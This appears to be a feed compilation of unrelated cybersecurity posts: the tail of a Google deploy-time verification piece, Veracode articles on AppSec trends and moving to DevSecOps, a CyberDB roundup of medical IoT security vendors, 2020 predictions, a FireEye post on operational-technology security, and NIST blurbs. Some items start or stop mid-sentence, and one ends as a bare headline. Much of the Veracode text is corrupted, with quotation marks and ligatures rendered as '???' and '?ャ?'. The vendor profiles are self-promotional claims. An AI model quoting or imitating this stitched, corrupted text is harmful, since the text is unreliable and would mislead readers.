In summary, implementing BAB, a deploy-time enforcement check, as part of Google’s containerized infrastructure and continuous integration and deployment (CI/CD) process has enabled us to verify that the code and configuration we deploy meet certain standards for security. Adopting BAB has allowed Google to reduce insider risk, prevent possible attacks, and also support the uniformity of our production systems. For more information about BAB, read our whitepaper, “Binary Authorization for Borg: how Google verifies code provenance and implements code identity.”

Additional contributors to this whitepaper include Kevin Chen, Software Engineer; Tim Dierks, Engineering Director; Maya Kaczorowski, Product Manager; Gary O’Connor, Technical Writing; Umesh Shankar, Principal Engineer; Adam Stubblefield, Distinguished Engineer; and Wilfried Teiken, Software Engineer; with special recognition to the entire Binary Authorization for Borg team for their ideation, engineering, and leadership

AppSec Themes to Watch in 2020

Contributors:

Paul Farrington, Veracode EMEA CTO

Pejman Pourmousa, Veracode VP of Services

Chris Wysopal, Veracode CTO and co-founder

As we said in the introduction to our 10th anniversary State of Software Security report this year, the last 10 years in AppSec saw both enormous change, and a fair amount of stagnation. Part of the reason for the stagnation is that software development is increasing at unprecedented rates, and security is often struggling to keep up. So as we shift our focus from reflection to prediction, we think application security in 2020 will be all about new solutions and best practices to keep up with the pace of development and empower developers to code both quickly and securely. A few AppSec themes we expect to see renewed focus on in 2020 include:

Security champions

With a security skills shortage, and an explosion of software development, it???s time to get creative to spread security skills and know-how across development teams. A security champions program is becoming a popular way to do this, and we expect to see more of these programs in 2020. In a recently released report, Building an Enterprise DevSecOps Program, security analyst Adrian Lane notes, ???I spoke with three midsized ?ャ?rms this week ??? their development personnel ranged from 800-2000 people, while their security teams ranged from 12 to 25.??? In the same report, he says of assigning security champions to development teams, ???Regardless of how you do it, this is an excellent way to scale security without scaling headcount, and we recommend you set aside some budget and resources ??? it returns far more bene?ャ?ts than it costs.???

A security champion is a developer with an interest in security who helps amplify the security message at the team level. Security champions don???t need to be security pros; they just need to act as the security conscience of the team, keeping their eyes and ears open for potential issues. Once the team is aware of these issues, it can then either ?ャ?x the issues in development or call in your organization???s security experts to provide guidance.

With a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.

Metrics that make sense

Metrics ??? or perhaps more accurately, the right metrics ??? are crucial for understanding what???s really happening in your AppSec program. They serve a dual purpose: They demonstrate your organization???s current state, and also show what progress it???s making in achieving its objectives.ツ?

On the flip side, focusing on the wrong metrics can lead to frustration, disengagement, and a stalled program. If you???ve got an overly stringent AppSec policy ??? for instance, ???fix all flaws found within two weeks??? ??? your metrics will not paint a pretty picture, and your developers will give up before they???ve begun. We think 2020 will be the year of getting AppSec metrics right with smart, achievable, sensible AppSec policies.

We will increasingly see a focus on providing developers with simple cues to encourage the right behavior, but in a realistic way. For example, teams start by classifying those security bugs that are highest priority, those that are important but not showstoppers, and those that, although not ideal, are acceptable to exist. Especially for the first two categories, they then track the average time to fix a security bug, baseline, and then negotiate targets so that engineers and product owners can buy-in. These metrics may ultimately help to determine compensation, but perhaps initially are linked to softer benefits for the team.

Security across the pipeline

We???re seeing organizations start to build security into each phase of the development pipeline, and expect to see more of this shift in 2020. From pre-commit scans in the the IDE (my code), to build scans in the CI pipeline (our code), to deployment scans in the CD pipeline (production code), security testing will cover code from inception to production.

Scaling

DevSecOps is no longer niche???organizations are moving faster and producing more software than ever before. Scaling is the name of the AppSec game in 2020. AppSec programs that are cumbersome or slow to scale will not last in this new decade. What are the keys to scaling AppSec?

A SaaS-based solution: The time and budget required to quickly scale an on-premises AppSec solution make it ill equipped for a modern DevSecOps environment.

Expert help: Outside AppSec expertise can be useful in helping to establish your security program???s goals and roadmap. More importantly, it can help keep your roadmap on track by guiding developers through the fixing of flaws your scans find.

Security champions: As we discussed in the section above, security champions will be key to doing more with less security staff.

Regulations

More and more security regulations are specifically calling out the need for application security ??? from NIST, to PCI, NY DFS, and GDPR. In turn, the need for a documented application security processes will become paramount in the new year. The Financial Services Sector Cybersecurity Profile from the FSSCC is an example of how FinTech firms are trying to unify reporting standards for the various regulatory frameworks.

Demand for secure software

IT buyers are increasingly questioning the security of software they are purchasing. If you can???t answer questions about your security practices or can???t address your customers??? audit requirements, you???re likely to experience lost or delayed sales opportunities. In some cases, prospects will turn elsewhere. However, vendors that can address these security concerns quickly and effectively stand out among suppliers and leverage security as a competitive advantage. A recent survey report we conducted with IDG found that 96 percent of respondents are more likely to consider doing business with a vendor or partner whose software has been independently verified as ???secure.???

In addition, thanks to the speed of modern software delivery, we will see the methods for attesting to the security of software change. For example, we anticipate a shift to process-based attestations, such as proof of the security of an application???s development process (as with Veracode Verified), rather than point-in-time third-party pen tests. Point-in-time tests will carry less and less weight as the speed of software updates and changes increase.

What???s behind this demand for proof of security? It stems in part from new, more dire impacts from security breaches. When Target was breached in 2013, it created headlines for a few weeks, but it didn???t really affect its bottom line. Today, that has changed. Now we are seeing acquisitions fail, CEOs lose jobs, and stock values take hits because of breaches. Proving your software is secure will give companies an advantage in 2020.ツ?ツ?

Learn more

Continue the conversation ??? join our upcoming discussion on AppSec in 2020 in our upcoming webinar, AppSec in 2020: What???s on the Horizon.

5 Promising vendors focusing on Cyber Security for Medical IoT (IoMT)

Medical IoT devices operate in care facility environments that encompass care giving, case management, customer service, and clinic management. As such, the risk of data gathered and managed by medical devices extends beyond the device itself. A compromise of clinic management services can propagate to IoT device command and control, allowing compromise of devices in attacks that do not directly touch the device at all. This is clearly the major driver for the emerging category of “Medical IoT (IoMT) Cyber Security ”

A large hospital for examples could be home to as many as 85,000 connected devices. While each of these devices has a significant role in the delivery of care and operational efficiency, each connected device also opens the door to a malicious cyberattack. A recent report from Irdeto,  found that 82 percent of healthcare organizations’ IoT devices have been targeted with a cyberattack within the last year.

Going over the players in this industry, it is clear that the Medical IoT security category includes a number of different approaches with the common target to provide the customer with a clear assets discovery and timely alerting on security breaches and attacks on its Medical environment.

Although many large security players are addressing this niche too, CyberDB identified a number of emerging players that are focusing on this industry and as such we expect them to benefit from the growth in this market. These players are (in alphabetical order):

Due to the clear use case and the growing awareness and need in this market, we can see general-purpose IoT security players moving towards the Medical IoT security market.

According a recent report by BisResearch, the overall Medical IoT Cyber security market has been witnessing a steady growth. The market is expected to continue to grow with a double digit CAGR of 41.38% during the forecast period 2019-2028.

 

 

 

 

 

 

CyberMDX

CyberMDX is a pioneer in medical cyber security, delivering visibility, threat prevention and analytics for medical and IoT devices and clinical assets. It is a best of breed product built from the ground up for healthcare delivery organizations. CyberMDX is established in 2017, acts globally and raised so far $10M of funds. Its headquarters reside in Tel Aviv & New York City

 CyberMDX counters and prevents growing cyber-threats against hospitals, ensuring its critical assets operational continuity as well as patient and data safety. CyberMDX  delivers endpoint visibility, network threat prevention and operational analytics for medical, IoT, and OT devices. The agentless solution automates the most granular, context-aware device profiling available on the market and combines it with healthcare tailored risk assessment and remediation capabilities.

Using CyberMDX, healthcare teams can easily:

  • Audit devices for software vulnerabilities and prioritize patching
  • Detect malicious activity and behavioral anomalies, triggering responses accordingly
  • Manage risks proactively via smart micro-segmentation planning and automation
  • Streamline clinical compliancy programs
  • Report device-relevant FDA recalls
  • Optimize device allocation and procurement decision based on usage insights
  • Track and manage medical asset lifecycles
  • Provide rich reports in support of HIPAA and corporate compliance efforts
  • Seamlessly integrate with existing cyber and IT solutions to enrich data sets, enhance workflows, and enable operational excellence

Differentiators

  1. Interdepartmental HDO functionality and true workflow enablement: CyberMDX takes a holistic, 360° view of healthcare organizations and understands that only by building a common frame of reference and cross-departmental synergies can wholesale progress be achieved. Beyond mere security, CyberMDX provides security, IT, clinical engineering and compliance teams with a platform for data-driven workflow enablement and collaboration.
  2. Unmatched, context-aware visibility: CyberMDX delivers deep visibility into medical devices, protocols, and connected things of all sorts — along with a clear-eyed view of their clinical context. This deep and contextual visibility drives prevention, incident response, risk mitigation, and lifecycle management (including patch availability notifications). The solution covers medical devices, IoT, and OT across the entire network — providing a single pane of glass from which to view all connected healthcare assets.
  3. Superior depth and breadth of risk reporting around clinical and critical assets: CyberMDX has a dedicated research team focused solely on connected healthcare and IoMT. The team works with medical device manufactures and regulatory bodies such as CISA, ECRI, MITRE and the FDA to spot and lock down cybersecurity hazards and vulnerabilities before they can be exploited by malicious actors.

Back

 

 

Cynerio

Cynerio was established in 2017 by a versatile team with expertise in cybersecurity, medical devices, and healthcare IT. Headquartered in New York City, Cynerio works with leading Healthcare Delivery Organizations (HDOs) worldwide and delivers the only medical-first cybersecurity solution clinical ecosystems require to stay secure and operate with the peace of mind they need to put their focus where it’s needed most: on patient care.

The Problem

The IoT is an emerging space with a broad sphere of challenges that gets even more complicated when placed in the healthcare context. Hospitals and other HDOs have limited visibility into which devices exist on their networks, device behavior, and vulnerabilities. This limited visibility and understanding impairs IT personnel’s ability to remediate without interrupting patient care.

Securing the healthcare IoT poses the multifold challenge of securing medical devices developed without security in mind. Many of these devices run on outdated operating systems and can’t be patched. Hospital staff often has limited knowledge of the scope of security risks and vulnerabilities introduced to the network by unprotected devices. This is further complicated by traditional security solutions that are ineffective in dealing with connected devices in general.

Hospitals also rely on various non-traditional medical devices to help deliver essential care, such as elevators used to transport patients and smart refrigerators used to store sensitive biological material and medications. These devices are connected to the clinical ecosystem and are involved in medical workflows but are often not given the proper priority when evaluating the security strategy.

The Solution

Cynerio’s holistic medical-first approach to healthcare  / Medical IoT cybersecurity management provides HDOs with a one-stop shop they can rely on by prioritizing patient care and privacy above all else while contextualizing risk and remediation within the framework of healthcare business goals. This approach to security allows HDOs to gain control over their clinical assets and helps achieve immediate security goals and meet strategic, long-term objectives.

Cynerio’s agentless and nonintrusive solution analyzes device communications and behavior to provide ongoing, accurate, and contextual assessments of risk and security posture. This enables swift remediation without impacting operations.

Back

 

 

Medigate

 

Medigate is a comprehensive platform for IoT cybersecurity. Distinguished by powerful capabilities driving use-cases that have revolutionized expectations around what clinical visibility can mean, Medigate is successfully partnering with health systems across the world to monetize risk reduction practice.

Not unlike other industries, Healthcare’s vaunted digital transformation is based on unprecedented, new levels of visibility. Although having the ability to identify connected endpoints represents a step forward, it is not the game-changer. Rather, it’s the device-specific, detailed attribution and utilization metrics passively captured by Medigate that competitively separates its offering. Made even more real by meaningful and fully operationalized integrations to the systems that can naturally benefit (e.g. NAC, firewalls, SIEM, CMMS and emerging applications in supply chain, procurement and finance), Medigate’s excellent track record with some of the nation’s largest health systems is easily verified.

It is not “magic” and Medigate’s engineering-heavy company profile reflects it. Medigate has done the heavy lift required to passively fingerprint all connected assets, including serially connected modules and/or devices “hidden” behind legacy and modern integration points. The approach is known as deep packet inspection (DPI).  Having invested in the engineering talent required to effectively parse the transmission flows between devices, nested modules, integration points and their payload destinations (e.g. EMRs), Medigate delivers the most detailed and accurate baselines available, while also providing continuously monitored, dynamic views of the entire connected ecosystem.

Emboldened by widely publicized and successful attacks, the FDA’s changing guidance, Joint Commission directives and the recognition by acute care providers that ultimately, it’s a patient safety issue, risk capital has poured into the problem space. Validating Medigate’s approach, competitors use deep packet inspection (DPI) when they can and rely on probabilistic methods (i.e. behavioral models promoted as AI) when they cannot. For DICOM and other protocols packaged in the HL7 framework, all vendors use DPI, but that’s as far as they go, and that’s a seminal difference. Solution evaluators should investigate that difference and make up their own minds.

Medigate’s deterministic approach relies on its proven ability to resolve more than one hundred unique medical device protocols encompassing thousands of common devices that would otherwise go uncovered. The skillsets required to do that, and the resulting superior data quality, have fueled far more meaningful system integrations, non-traditional cross functional collaborations and numerous new use-cases that are turning risk reduction into a more strategically diverse, revenue creation practice. In terms of clinical network visibility, Medigate-powered “views” of what’s now possible are strengthening IT’s ROI mission to the enterprise.

Back

 

 

 

Sternum

Sternum, the multilayered cybersecurity solution offering real-time, embedded protection for IoT devices, was founded in 2018 in Tel Aviv by a team of highly experienced R&D and business leaders. Sternum has a profound understanding of embedded systems and deep insights into the dynamics of today’s threats, offering a new standard of cybersecurity for medical IoT devices. In accordance with the FDA’s pre-market cybersecurity guidelines (which included our commentary), and with unique technology that is ensuring the security of all connected medical devices, Sternum is protecting patients’ lives.

The result: Robust defense of lifesaving devices such as pacemakers and insulin pumps by mitigating known threats while simultaneously adapting to and combating new ones.

 

The company has developed two holistic solutions:

  • Sternum’s Embedded Integrity Verification (EIV) identifies and blocks cyberattacks in real time. This integrity-based attack prevention can be deployed to any medical device, including distributed and unmanaged IoT devices. EIV operates like an on-device firewall, validating each operation within the device. EIV only needs to be deployed once. Once EIV is installed, every new piece of code (including 3rd party) receives protection automatically, fitting into the low resource environment of medical devices and providing security throughout the device’s lifecycle.
  • Sternum’s Real-time IoT Event Monitoring System (RIEMS) provides first-of-its-kind visibility from within IoT devices (including operating systems and other 3rd party components) so that OEMs who manufacture the devices, enterprises who implement them, and consumers who use them are immediately alerted to indications of any cyber breach, including prevented attack attempts. RIEMS also continuously monitors devices outside managed networks, enabling OEMs to maintain control of product security for all distributed devices.

How is Sternum’s software-only product suite revolutionary in the medical IoT world?

  • Sternum, as a high-diversity and platform-agnostic solution, is the only on-device, real-time cybersecurity solution supporting all types of real-time operating systems (RTOS) and homegrown OS.
  • Sternum’s solution operates during runtime with exceptionally low overhead of 3%.
  • Because it operates in real time, the solution thwarts zero-day attacks.
  • While network security solutions fail to adequately secure today’s distributed medical devices, Sternum provides real-time monitoring of devices outside managed networks.
  • Cyberattack prevention is near-perfect when utilizing Sternum’s EIV solution; for over 170 cyberattacks, 96.5% were prevented when benchmarked with RIPE (Runtime Intrusion Prevention Evaluator).

Sternum’s unique, flexible cyber security solution for the Internet of Medical Things (IoMT) can be seamlessly integrated with any medical device’s operating system and development process.

Back

 

 

 

 

VDOO

Founded in 2017 by serial cybersecurity entrepreneurs Netanel Davidi and Uri Alter, VDOO has raised $45 million from top-tier investors including 83North, Dell Technology Capital, WRVI Capital, GGV Capital, NTT DOCOMO Ventures and MS&AD ventures. The company currently has more than 65 employees at our offices in the US, Japan and Israel, and dozens of well-known customers around the globe including Medtronic, Stanley Healthcare, NTT and MS&AD.

With device security quickly becoming a strategic imperative for the healthcare market, product security teams that work on medical devices cannot keep making long-term decisions based on a partial picture of possible vulnerabilities at a single stage of the device lifecycle. In order to scale their ability to provide optimal security, they must replace the time- and resource-intensive point solutions they are using today with a single integrated platform.

This is where VDOO comes in. Our Product Security Platform for Connected Devices is the only automated security solution that is integrated across the entire medical device lifecycle – from design and development all the way to deployment, post-deployment and legacy. The end-to-end platform includes modules for security analysis, gap resolution, regulatory compliance, embedded protection, operations monitoring, executive insights and threat intelligence.

VDOO’s unique approach to providing optimal security for medical devices is based on the combination of our patented technology with advanced binary analysis and highly sophisticated machine learning capabilities. This is augmented by our research team, which includes some of the world’s leading embedded security experts, that has built the most comprehensive device security database available today based on the thorough analysis of hundreds of millions of binaries and tens of thousands of connected products.

The VDOO platform’s key differentiators and benefits:

  1. Contextual and focused device-specific security – Speed up time-to-market and reduce the risk of attacks by cutting out the noise and focusing on the right threats
  2. Automated security processes for the entire device lifecycle – Improve the efficiency of SDLC processes, reducing operational resource requirements across the board
  3. Verified compliance with leading standards and regulations – Increase product sales while improving customer adoption by ensuring that all devices are compliant
  4. Full visibility into the software supply chain – Reduce dependency on third parties by owning your security, thus lowering legal, monetary and reputational risks
  5. Comprehensive end-point security visibility and analytics – Monetize security as a business model by offering monitoring and protection services to end-users

Back

 

 

The post 5 Promising vendors focusing on Cyber Security for Medical IoT (IoMT) appeared first on CyberDB.

Making Moves: How to Successfully Transition to DevSecOps

As we look toward the future, it is becoming critical that development organizations are not only agile and flexible but ??? just as important ??? secure. In turn, security and development need to work together more closely than ever before. When security and development are in unison, organizations can produce higher quality code quicker and more securely while reducing costs and conforming to regulations. Most companies realize that DevSecOps is the true nirvana, but they are not sure how to get there.

For starters, a successful transition to DevSecOps means that security and development teams need to reevaluate their roles. Ensuring the stability and security of software is no longer just the security team???s responsibility, it now includes developers. Developers should be testing, and security professionals should now be governing the testing. This culture shift can be a real challenge given that most security professionals have never worked alongside development teams and are not familiar with their processes, priorities, or tools. But once security and development teams are able to successfully work hand in hand, DevSecOps is achievable.ツ?ツ?

With this culture shift in mind, how do we formulate an AppSec strategy that transforms DevOps into DevSecOps? In its new report, Building an Enterprise DevSecOps Program, analyst firm Securosis provides an outline of the security tools and techniques needed at each stage in the software development lifecycle:

Define and Architect Phase

Reference security architectures: Reference security architectures ??? or service provider guidelines for cloud services ??? to understand the rules and policies that dictate how applications operate and communicate. Once you are familiar with the security architecture, you should work with development to come up with operational standards. Some important operational standards to consider include minimal testing security requirements, time frames for fixing issues, and when to break a build.ツ?ツ?

Security requirements: Decide which security tests should be run prior to deployment. Are you going to test for OWASP Top Ten vulnerabilities?

Monitoring and metrics: Consider what metrics you need to improve releases or problematic code or to determine what is working well. You should also think about what data you want to collect and build it into your CI/CD and production environments to measure how your scripts and tests perform.

Design Phase

Security design principles: Follow security design and operational principles because they offer valuable security improvement recommendations. Following these principles can be time consuming, but IT and development typically help because it benefits them as well.

Secure the deployment pipeline: Ensure that development and test environments are secure. Set up strict access controls for CI/CD pipelines and additional monitoring for scripts running continuously in the background.

Threat modeling: Teach the development team about common threat types and help them plan out tests to address attacks. If your security team is not able to address threat monitoring internally, you can consider hiring a consultant.

Develop Phase

Automate: Automating security testing at this phase is key.

Secure code repositories: Make it easy for developers to get secure and internally approved open source libraries. How? Consider keeping local copies of approved, easy-to-access libraries, and use a combination of composition analysis tools and scripts to make sure developers are using the approved versions.

Security in the scrum: Set up your "security champions" program, training selected members of the development teams in security basics, to help with these security tasks.

Test-driven development: Consider incorporating security into test-driven development, where tests are constructed along with code.ツ?ツ?

Interactive Application Security Testing (IAST): Analyze your application???s code using IAST. The IAST scanner aims to find security vulnerabilities before you launch code into production.

Test Phase

Design for failure: The thought process behind this concept is, if there is a flaw with your application, it is better that you break it than an attacker.

Parallelize security testing: Address security tests that are slowing down your deployments by running multiple tests in parallel. Reconfiguring test environments for efficiency helps with Continuous Integration.

Pre-Release Phase

Elasticity: Make sure your security testing leverages on-demand elastic cloud services to speed up security testing.

Test data management: Prevent unnecessary data breaches by locking down production environments so quality assurance and development personnel cannot ex?ャ?ltrate regulated data or bypass your security controls. Consider using tools like data masking or tokenization, which deliver test data derived from production data but without the sensitive information.

Deploy Phase

Manual vs. automated deployment: Use automation whenever possible. It is okay to use some manual processes, but it is important to remember that the more you automate, the more capacity the team will have to test and monitor.ツ?

Deployment and rollback: Start by using smoke tests to make sure that the test code that worked in pre-deployment still works in deployment. Then, if you need to augment deployment, use one of these three tricks. The first is Blue-Green or Red-Black deployment. This is where old and new code run simultaneously on their own set of servers. The rollout is simple and, if errors are uncovered, the load balancers are pointed back to the older code. The second is canary testing. In canary testing, a small subset of individual sessions is directed toward the new code. If erors are encountered and the canary dies, the new code is retired until the issue is fixed. Lastly, feature tagging enables and disables new code elements. If event errors are found in a new section of code, you can toggle off the feature until it is fixed.

Production security tests: Note that it is common for applications to continue to function even when security controls fail. Consider employing penetration testers to examine the application at runtime for ?ャ?aws.

Learn More

By embracing the role changes brought about by DevOps and working with developers to add security tools and techniques into the software delivery lifecycle, you can successfully transition to DevSecOps.

Get more detailed information on building out a DevSecOps program in the Securosis report, Building an Enterprise DevSecOps Program.

5 Cybersecurity Predictions For 2020

While it may be true that nobody can predict the future, when it comes to cybersecurity you can give it a good go. By looking at the security developments that we have witnessed over the past few years, it is perfectly possible to forecast what is likely to happen in the near future.

Plus, with 2020 just around the corner, now is the time to do exactly that. Staying ahead of the game and doing all you can to avoid the risk of a cyber-attack is vital; and what better way is there to do just that than by preparing yourself in advance.

From the rise of 5G to the implementation of AI, here are five cybersecurity predictions for the coming year.

  1. Targeted ransomware.

While many people may see advances in technology as a good thing, coupled with that movement has seen a rise in people’s susceptibility to cyber-attacks. As time has moved on, ransomware has become more and more targeted against specific businesses, and that doesn’t look set to change in 2020.

In fact, it looks like it’s going to get worse.

Rather than initiating a cyber-attack at the first available opportunity, attackers are now biding their time, gathering intelligence on their soon-to-be victims. In doing so, this enables them to inflict maximum disruption and scale up their ransom demands accordingly.

  1. Cyber-attack? Go phish.

A cyber resilience study by the FSB found there are an incredible seven million cyber-crimes against small businesses every year. A large proportion of these attacks came via what’s known as ‘phishing’ – a type of attack used by cybercriminals masquerading as a trusted person or business to steal data. Using a malicious link, these criminals dupe victims into opening a damaging email, instant message or text message.

As time moves forward, this type of attack is going to become more and more difficult to identify, especially when you consider the growing culture of big data. Email is currently the most popularly used channel for these kinds of attack but, over the next year, cybercriminals will likely start using alternative methods, such as social media messaging and gaming platforms, to target their attacks.

  1. More devices, more problems.

Next year looks set to be the year of 5G – a new data network promising higher internet speeds than ever before. While this is very exciting, the implementation of this network will also bring with it an explosion in the numbers of connected devices and sensors across the world – from connected car services to eHealth applications.

As a result, more data will be being collected than ever before which, in turn, will heighten the potential for data theft. In order to protect against this, cybersecurity firms will therefore need to look at designing effective systems capable of minimising the risk.

  1. Artificial aid.

Most of the pre-existing security solutions available today have been built using human logic. While that may have been fine in the past, as we move forward into an ever-growing technological world, keeping informed about the latest threats is almost impossible manually. Therefore, cybersecurity firms will need to think of new, advanced ways to combat threats – and fast.

Fortunately, this is where artificial intelligence (AI) comes in. Using AI in cyber security is a great way of identifying and responding to threats before they can spread. Utilising this in cyber defence mechanisms can and will need to take centre stage in the coming months, but firms will also need to remain cautious about its potential; cybercriminals will also be able to take advantage of AI, using innovative techniques to identify vulnerabilities and infiltrate networks.

  1. Head in the cloud.

The increasing reliance for public cloud infrastructure only heightens the likelihood of being targeted by cybercriminals. After all, the more exposed a business is, the more at risk it will be.

Therefore, over the next 12 months, many companies will begin looking at their existing data centre and think about creating a hybrid cloud environment for their public and private data. This, in turn, will improve their level of data protection and safeguard them from data loss instances, such as Google’s cloud outage earlier this year.

In conclusion…

Today’s interconnected world provides a wealth of opportunities for cybercriminals and cyber security firms alike. While this may make it sound like a bit of a cat and mouse contest, it’s anything but. By being able to predict what might happen in the coming year, cybersecurity providers can stay ahead of the game and use advanced threat intelligence to develop effective counteractive systems.

The post 5 Cybersecurity Predictions For 2020 appeared first on CyberDB.

NIST Releases Data to Help Measure Accuracy of Biometric Identification

New biometric research data — ranging from fingerprints to facial photographs and iris scans — is now available from the National Institute of Standards and Technology (NIST). Stripped of identifying information and created expressly for research purposes, the data is designed primarily for testing systems that verify a person’s identity before granting access — be it to another room or another country. Few available resources exist to help developers evaluate the performance of the software algorithms that form the heart of these systems, and the NIST data will help fill that gap. “This all

The FireEye Approach to Operational Technology Security

Today FireEye launches the Cyber Physical Threat Intelligence subscription, which provides cyber security professionals with unmatched context, data and actionable analysis on threats and risk to cyber physical systems. In light of this release, we thought it would be helpful to explain FireEye’s philosophy and broader approach to operational technology (OT) security. In summary, combined visibility into both the IT and OT environments is critical for detecting malicious activity at any stage of an OT intrusion. The FireEye approach to OT security is to:

Detect threats early using full situational awareness of IT and OT networks.

The surface area for most intrusions transcend architectural layers because at almost every level along the way there are computers (servers and workstations) and networks using the same or similar operating systems and protocols as used in IT, which serve as an avenue of approach for impacting physical assets or control of a physical process. The oft touted airgap is in many cases a myth.

There is often a singular focus from the security community on industrial control system (ICS) malware largely due to its novel nature and the fact that there have been very few examples found. This attention is useful for a variety of reasons, but disproportionate to the actual methods of the intrusions where ICS-tailored malware is used. In the attacks utilizing Industroyer and TRITON, the attackers moved from the IT network to the OT network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz extracts, remote desktop sessions and other well-documented, easily detected attack methods were used throughout these intrusions and found at every level of the IT, IT DMZ, OT DMZ and OT environments.

We believe that defenders and incident responders should focus much more attention on intrusion methods, or TTPs, across the attack lifecycle, most of which are present on what we call “intermediary systems”—predominately networked workstations and servers using operating systems and protocols that are similar to or the same as those used in IT, which are used as stepping-stones to gain access to OT assets. This approach is effective because almost all sophisticated OT attacks leverage these systems as stepping stones to their ultimate target.

To illustrate this philosophy, we present some new concepts for approaching OT threats, including the Funnel of Opportunity for OT Threat Detection and the Theory of 99, as well as practical examples derived from our analysis and incident response work. We hope these ideas challenge others in the security community to put forward new ideas and drive discussion and collaboration. We strive for a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time and their freedom.

The "Funnel of Opportunity" Highlights the Value of Detecting OT Attacks In "Intermediary Systems"

Over the past 15 years of responding to and analyzing many of the most important threats in IT and OT, FireEye observed a consistent pattern across almost all OT security incidents: There is an inverse relationship between the presence of an attacker’s activities and the severity of consequence to physical assets or processes. The attack lifecycle when viewed like this begins to take on a “funnel” shape, representing both the breadth of attacker footprint and the breadth of detection opportunity for any given level. Similarly, from top to bottom we represent the timeline of the intrusion and its proximity to the physical world. The bottom is the cross-over of impact from the cyber world to the physical world.


Figure 1: The Funnel of Opportunity for OT Threat Detection

In the early stages of the attack lifecycle, the intruder spends prolonged periods of time targeting components such as servers and workstations across IT and the IT DMZ. Identifying threat activity at this architectural level is relatively straightforward given that dwell time is high, threat actors often leave visible traces, and there are many mature security tools, services and other capabilities designed to detect this activity. While it is difficult to anticipate or associate this early intrusion activity in IT layers with more complex OT targeted attacks, IT networks remain the best zone to detect attacks.

In addition to being relatively easy to detect, early attacker activity also presents a very low risk of negative impact to OT networks. This is primarily because OT networks are commonly segmented, often with an OT DMZ separating them from IT, limiting attacker access to the industrial process. Also, targeted OT attacks commonly require threat actors to acquire abundant process documentation to determine how to cause a desired outcome. While some of this information may be available in IT networks, planning this type of attack would almost certainly require further process visibility only available in the OT network. This is why, as the intrusion progresses and the attacker gets closer or gains access to OT networks, the severity of possible negative outcomes becomes proportionally higher. However, the activity becomes more difficult to detect as the attacker’s footprint grows smaller and there are fewer security tools available to defenders.

The TRITON and Industroyer Attacks Exemplify This Phenomenon

Figure 2 shows an approximate representation of endpoints that were compromised across the architecture of victim organizations during the TRITON and Industroyer attacks. The Funnel of Opportunity is located in the intersection between the two triangles. It is here where the balance between attacker presence and operational consequence of an intrusion makes it easier and more meaningful for security organizations to identify threat activity. As a result, threat hunting close to the OT DMZ and DCS represents the most efficient approach as the detectable features of the intrusion are still present and the severity of potential consequences of the intrusion is high, but still not critical.


Figure 2: Approximate representation of endpoints compromised during the TRITON and Industroyer attacks

In both the TRITON and Industroyer incidents, the threat actor followed a consistent pattern traversing the victims’ architecture from IT networks, through the OT network, and ultimately reaching the physical process controls. In both incidents, we observed that the actor moved through segmented architectures using computers located in different zones. While we only illustrated two incidents in this blog post, we highlight that movement across zones leveraging computers has also been observed in every public OT security incident to date.

The Theory of 99: Almost All Threat Activity Happens in Windows and Linux Systems

FireEye’s unique visibility into the full attack lifecycle of thousands of intrusions from both independent research and first-hand incident response experience has enabled us to support this theory with real-world data, some of which we share here. FireEye has consistently identified similar TTPs leveraged by threat actors regardless of their target industry or ultimate goals. We believe that visibility into network traffic and endpoint behaviors are some of the most important components for IT security. These components are also critical in preventing pivots to key assets in the OT network and detecting threat activity once it does reach OT.

Our observations can be summarized in what we call the Theory of 99, which states that in intrusions that go deep enough to impact OT:

  • 99% of compromised systems will be computer workstations and servers
  • 99% of malware will be designed for computer workstations and servers
  • 99% of forensics will be performed on computer workstations and servers
  • 99% of detection opportunities will be for activity connected to computer workstations and servers
  • 99% of intrusion dwell time happens in commercial off-the-shelf (COTS) computer equipment before any Purdue level 0-1 devices are impacted

As a result, there is often a significant overlap across TTPs utilized by threat actors targeting both IT and OT networks.


Figure 3: TTPs seen across both IT and OT incidents

Figure 3 presents a summary of TTP overlaps between TRITON, Industroyer, and some relatively common activity from cybercrime group FIN6. FIN6 is a group of intrusion operators who have compromised multiple point-of-sale (POS) environments to steal payment card data and sell it in on the dark web. While the motivations and ultimate goal of the threat actors that developed TRITON and Industroyer differ significantly from FIN6, the three actors share common TTPs, including the use of Meterpreter, compromising dual-homed systems, leveraging RDP to establish remote connections and so forth. The overlap in tools and TTPs across actors interested in IT and OT should be of no surprise. The use of IT tools for OT compromises directly corresponds to a trend best known as IT/OT convergence. As IT equipment increasingly becomes integrated in OT systems and networks to improve efficiency and manageability, we can expect threat actors to be able to leverage networked computers as a conduit to reach industrial controls.

Drawing parallels between intrusions into high security environments, we can gain insight into actor behaviors and identify detection opportunities earlier in the attack lifecycle. Intelligence on intrusions across various sectors can be useful in highlighting which common and emerging adversary tools and TTPs are likely to be used in tailored attacks against organizations with OT assets.

FireEye Services, Intelligence, and Technology Provide Unparalleled Protection In IT and OT

While the FireEye approach to OT security detailed in this blog post emphasizes the criticality of “intermediary systems” when defending OT, we do not want to downplay the importance of the OT expertise and technology needed to respond to the most critical 1% of threat activity that does impact control systems. OT is in our DNA at FireEye: FireEye Mandiant’s OT practice has been one of the leading industry voices over the past six years, and the FireEye Cyber Physical Intelligence offering is the most recent evolution of the heritage of Critical Intelligence—the first commercial OT threat intelligence company founded in 2009.


Figure 4: FireEye OT-specific offerings

We believe that sharing our philosophy for OT security and highlighting FireEye’s comprehensive OT security capabilities will help organizations look at this security challenge from a different angle and take tangible steps forward to build a robust, all-encompassing security program. Figure 4 maps FireEye’s OT security offerings against the NIST Cybersecurity Framework’s Five Functions, matching FireEye services to the lifecycle of an organization’s cyber security risk management.

If you are interested in learning more or purchasing FireEye OT-focused solutions, you can reach out here: FireEye OT Solutions.

Next Up! Cybersecurity Framework Webinar: Helping Small & Medium-sized Businesses to manage Cybersecurity Risks

Note: Captioning will be available by 12/20/19 Please see below, a list of resources that were mentioned during the webinar: National Cyber Security Alliance (NCSA) – https://staysafeonline.org/ Manufacturing Extension Partnership (MEP) – https://www.nist.gov/mep Small Business Development Centers (SBDCs) - https://americassbdc.org/ NIST Small Business Cybersecurity Corner (SBCC) - https://www.nist.gov/itl/smallbusinesscyber Speaker Bios: Patricia toth, NIST Pat is the Cybersecurity Program Manager at the NIST Manufacturing Extension Partnership (MEP). She works with MEP Centers nationwide to

Plundervolt! A new Intel Processor ‘undervolting’ Vulnerability

